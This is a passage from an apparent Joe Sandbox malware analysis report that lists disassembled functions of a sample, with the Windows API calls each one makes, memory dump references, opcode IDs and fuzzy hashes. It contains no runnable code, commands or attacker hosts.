                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 521402451-0
                                                                                                                            • Opcode ID: acef3e904ba4ea1efa2dce7379b9f32c98121c7d01736101d088382d939e0368
                                                                                                                            • Instruction ID: a49e44ab010d1eabe67275ccf6513a7120ba90f5f894a1cce73937d00d46a481
                                                                                                                            • Opcode Fuzzy Hash: acef3e904ba4ea1efa2dce7379b9f32c98121c7d01736101d088382d939e0368
                                                                                                                            • Instruction Fuzzy Hash: 5C113A72914204AFDB08B7B4AC879FE7768DF82320F244015F105971C2EE30598677E1
                                                                                                                            APIs
                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C817A3
                                                                                                                              • Part of subcall function 00C8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8184C
                                                                                                                              • Part of subcall function 00C8182D: InternetCloseHandle.WININET(00000000), ref: 00C818E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1463438336-0
                                                                                                                            • Opcode ID: a9363de81d553b5160eb1d4e5175afbabe9a5eafd98ac56319efa768e1e6552e
                                                                                                                            • Instruction ID: c38049bb38c6b757ea4bb7fcc483d7727b519e5d5ec1fee16e8e11bacdb13982
                                                                                                                            • Opcode Fuzzy Hash: a9363de81d553b5160eb1d4e5175afbabe9a5eafd98ac56319efa768e1e6552e
                                                                                                                            • Instruction Fuzzy Hash: 0721B031200605BFEB12AF609C05BBABBEDFB48714F15402EFD11D6591D7719912A7A8
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNEL32(?,00C9FAC0), ref: 00C73A64
                                                                                                                            • GetLastError.KERNEL32 ref: 00C73A73
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C73A82
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C9FAC0), ref: 00C73ADF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2267087916-0
                                                                                                                            • Opcode ID: a8e7ae8308270358404d113441a47bda1bb830dcd57afe7e803f7a9cf5e6c00e
                                                                                                                            • Instruction ID: 6d4998f2749193e1c765ee0c2ee59eb9f589097cbd7bad9a92dbd81b5281b699
                                                                                                                            • Opcode Fuzzy Hash: a8e7ae8308270358404d113441a47bda1bb830dcd57afe7e803f7a9cf5e6c00e
                                                                                                                            • Instruction Fuzzy Hash: B42196345082419F8700DF64C8469AA77E8AF55364F108A2DF4ADC72A1DB31DA46FB52
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 00C45101
                                                                                                                              • Part of subcall function 00C3571C: __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                                                                              • Part of subcall function 00C3571C: __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                                                                              • Part of subcall function 00C3571C: RtlAllocateHeap.NTDLL(00EE0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 614378929-0
                                                                                                                            • Opcode ID: 5c6c6c7c26ccc6f646ac6eca015f7aa90826892ef836c1fda2a2c8c51f51885b
                                                                                                                            • Instruction ID: 13edf516b30ecaceb460c4bb7d6bf55e017afab16dc87bef815bdeeb64ade081
                                                                                                                            • Opcode Fuzzy Hash: 5c6c6c7c26ccc6f646ac6eca015f7aa90826892ef836c1fda2a2c8c51f51885b
                                                                                                                            • Instruction Fuzzy Hash: 82112572910B16AFCF312F70EC45B6E3798BF043B1F20453AF9549A162DF348A41A790
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C144CF
                                                                                                                              • Part of subcall function 00C1407C: _memset.LIBCMT ref: 00C140FC
                                                                                                                              • Part of subcall function 00C1407C: _wcscpy.LIBCMT ref: 00C14150
                                                                                                                              • Part of subcall function 00C1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C14160
                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00C14524
                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C14533
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C4D4B9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1378193009-0
                                                                                                                            • Opcode ID: 67d59b3b1f9256ae675d6e2f10e829358644cc23d088e6135c0914918aca717e
                                                                                                                            • Instruction ID: 28b689c6d4744d33d60c357d80f2f97e16dc04fb143cd38ab83b8f2afbc83032
                                                                                                                            • Opcode Fuzzy Hash: 67d59b3b1f9256ae675d6e2f10e829358644cc23d088e6135c0914918aca717e
                                                                                                                            • Instruction Fuzzy Hash: 1F21D7749047849FE7329B249859BEABFECAF06314F04009EE69E96281C3742A84DB51
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                                                                              • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                                                                            • gethostbyname.WSOCK32(?,?,?), ref: 00C86399
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00C863A4
                                                                                                                            • _memmove.LIBCMT ref: 00C863D1
                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00C863DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1504782959-0
                                                                                                                            • Opcode ID: 9b8a4273db717001532077b0d2ffdfa60df5a1101326bdf6481bb716361937f8
                                                                                                                            • Instruction ID: fc6ef54e1b00a237a5d30bde10373d65a2e187aa3645078cfa21622ed82ff5c8
                                                                                                                            • Opcode Fuzzy Hash: 9b8a4273db717001532077b0d2ffdfa60df5a1101326bdf6481bb716361937f8
                                                                                                                            • Instruction Fuzzy Hash: 38116A32A00109AFCB00FBA4D996DEEB7B8AF46314B144029F506A71A1DB30AE45EB61
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C68B61
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68B73
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68B89
                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C68BA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3850602802-0
                                                                                                                            • Opcode ID: d610cd0c704f88107065b0a1b8fb41a643b398ba04f74a18c56af2b58fdf347d
                                                                                                                            • Instruction ID: 0bf4a307a42d2b0783223c42271578401e490f1a5ad941a00280c68c1ab9c052
                                                                                                                            • Opcode Fuzzy Hash: d610cd0c704f88107065b0a1b8fb41a643b398ba04f74a18c56af2b58fdf347d
                                                                                                                            • Instruction Fuzzy Hash: EB114879900218FFEB10DFA5CC84FADBBB8FB48710F2041A5EA00B7290DA716E11DB94
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 00C112D8
                                                                                                                            • GetClientRect.USER32(?,?), ref: 00C4B5FB
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C4B605
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C4B610
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4127811313-0
                                                                                                                            • Opcode ID: 6718337a31f03b4d569e1511e8ef83e6184f0b1aece3d6c9e7b832cdfebe86c7
                                                                                                                            • Instruction ID: 6093e05c8943fdc780a28df3f302bdeeaa60c5b25e83acd55e57a7c6145d6008
                                                                                                                            • Opcode Fuzzy Hash: 6718337a31f03b4d569e1511e8ef83e6184f0b1aece3d6c9e7b832cdfebe86c7
                                                                                                                            • Instruction Fuzzy Hash: 46114F35501519EFCF10DF94D889AFE77B8FB06301F500456FA11E7140C734BA91ABA5
                                                                                                                            APIs
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C7115F
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C71184
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C7118E
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00C6FCED,?,00C70D40,?,00008000), ref: 00C711C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2875609808-0
                                                                                                                            • Opcode ID: c89f42b426d3f2c98ff81d5472816fcbae43d91ff59543f05771b660a3f27f61
                                                                                                                            • Instruction ID: 5fe38581faccbbff050cbab263b6ff1adca4508e26904a91e3b881f7d908a2d5
                                                                                                                            • Opcode Fuzzy Hash: c89f42b426d3f2c98ff81d5472816fcbae43d91ff59543f05771b660a3f27f61
                                                                                                                            • Instruction Fuzzy Hash: 49111831D00519D7CF009FA9D848BEEBB78FB09711F45805AEE49BA240CA7096918BD5
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C6D84D
                                                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C6D864
                                                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C6D879
                                                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C6D897
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1352324309-0
                                                                                                                            • Opcode ID: c234c4d7d9a123f6f8e4caa63a93dda4bd6ae7f52b92338d91eb95b2eaad187d
                                                                                                                            • Instruction ID: 3cea9cc6f9f50ade89539c62445402cf97d2c3360b5d212d3a247a8fafbdb548
                                                                                                                            • Opcode Fuzzy Hash: c234c4d7d9a123f6f8e4caa63a93dda4bd6ae7f52b92338d91eb95b2eaad187d
                                                                                                                            • Instruction Fuzzy Hash: 07113C75A05304DBE3308F51EC8CF96BBA8EB04B00F10856EA516D7490D7B0E9599BE1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                            • Instruction ID: 8e73ab37c2f9a5662a012a2a8027ab79e84fa5f27f1d9272b33d85548fe73d8f
                                                                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                            • Instruction Fuzzy Hash: FD014C7244914ABBCF265F84DC45CEE3F62BB18350F598615FE6858031D336DAB1AB81
                                                                                                                            APIs
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C9B2E4
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C9B2FC
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C9B320
                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C9B33B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 357397906-0
                                                                                                                            • Opcode ID: 8d8c66b57ec94e5203562c27c857ecc24034dd90ddb6cc397c01326335c03ae6
                                                                                                                            • Instruction ID: a0ecb9ed76821816613781fd249f46d5cc607f48fe0bb36ead2adec8e1b9ceb8
                                                                                                                            • Opcode Fuzzy Hash: 8d8c66b57ec94e5203562c27c857ecc24034dd90ddb6cc397c01326335c03ae6
                                                                                                                            • Instruction Fuzzy Hash: BB114675D00209EFDB41CF99D544AEEFBB5FB08310F104166E914E3220D735AA558F50
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C9B644
                                                                                                                            • _memset.LIBCMT ref: 00C9B653
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CD6F20,00CD6F64), ref: 00C9B682
                                                                                                                            • CloseHandle.KERNEL32 ref: 00C9B694
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseCreateHandleProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3277943733-0
                                                                                                                            • Opcode ID: f424ac7c0401e67e923be0c321e5aefe6178e3efb925ee491adafa8957eb96f5
                                                                                                                            • Instruction ID: dc33c1d946d72277de47355d71f1b9cab80c19e0a72d24edec0d96a26c373ffe
                                                                                                                            • Opcode Fuzzy Hash: f424ac7c0401e67e923be0c321e5aefe6178e3efb925ee491adafa8957eb96f5
                                                                                                                            • Instruction Fuzzy Hash: A0F05EF26417047AE61027A1BC0AFBF3B9CEB08395F004026FA08E51A2D7755C01C7A8
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00C76BE6
                                                                                                                              • Part of subcall function 00C776C4: _memset.LIBCMT ref: 00C776F9
                                                                                                                            • _memmove.LIBCMT ref: 00C76C09
                                                                                                                            • _memset.LIBCMT ref: 00C76C16
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00C76C26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 48991266-0
                                                                                                                            • Opcode ID: 64a0b7814f3cf9ffa6da506666fc36702e54bb2576c834921a434cf8023919c9
                                                                                                                            • Instruction ID: b074a19c5e74b8d709c276a97a4389888d781d9a934d997cc97994ab19e11287
                                                                                                                            • Opcode Fuzzy Hash: 64a0b7814f3cf9ffa6da506666fc36702e54bb2576c834921a434cf8023919c9
                                                                                                                            • Instruction Fuzzy Hash: D4F05E3A200100ABCF016F55EC89B8ABB2AEF45361F14C066FE089E227C731E811DBB4
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(00000008), ref: 00C12231
                                                                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00C1223B
                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00C12250
                                                                                                                            • GetStockObject.GDI32(00000005), ref: 00C12258
                                                                                                                            • GetWindowDC.USER32(?,00000000), ref: 00C4BE83
                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C4BE90
                                                                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00C4BEA9
                                                                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00C4BEC2
                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00C4BEE2
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C4BEED
                                                                                                                            Memory Dump Source
